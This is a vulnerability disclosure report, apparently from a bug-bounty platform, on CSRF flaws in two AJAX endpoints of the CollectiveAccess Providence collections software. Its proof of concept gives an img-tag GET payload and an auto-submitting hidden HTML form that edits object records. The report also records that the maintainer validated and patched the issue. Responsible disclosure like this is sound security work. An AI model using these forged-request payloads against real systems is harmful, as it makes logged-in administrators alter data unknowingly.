Cross-Site Request Forgery (CSRF) in collectiveaccess/providence

Valid

Reported on

Oct 11th 2021


Description

More AJAX endpoints vulnerable to CSRF.

1: GET http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult

2: POST http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData

Proof of Concept

1: http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult?set_name=new&mode=from_results&item_ids=

<img src="http://10.0.2.15/providence/index.php/find/BrowseObjects/createSetFromResult? set_name=new&mode=from_results&item_ids=">

2: http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData

<html>
  <body>
        <form action="http://10.0.2.15/providence/index.php/find/SearchObjects/saveResultsEditorData" method="POST">
        <input type="hidden" name="_formName" value="caEditableResultsComplexDataForm" />
        <input type="hidden" name="form_timestamp" value="2633930542" />
        <input type="hidden" name="id" value="1" />
        <input type="hidden" name="row" value="0" />
        <input type="hidden" name="col" value="0" /> 
        <input type="hidden" name="idno_accession_number" value="edited!" />
        <input type="hidden" name="bundle" value="ca_objects%2Cidno" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html>

Impact

This vulnerability is capable of tricking admins to edit object data and creating objects

We have contacted a member of the collectiveaccess/providence team and are waiting to hear back 2 months ago
CollectiveAccess validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess
a month ago

Maintainer


Thanks for finding this one. It's patched.

CollectiveAccess confirmed that a fix has been merged on 815d5d a month ago
CollectiveAccess has been awarded the fix bounty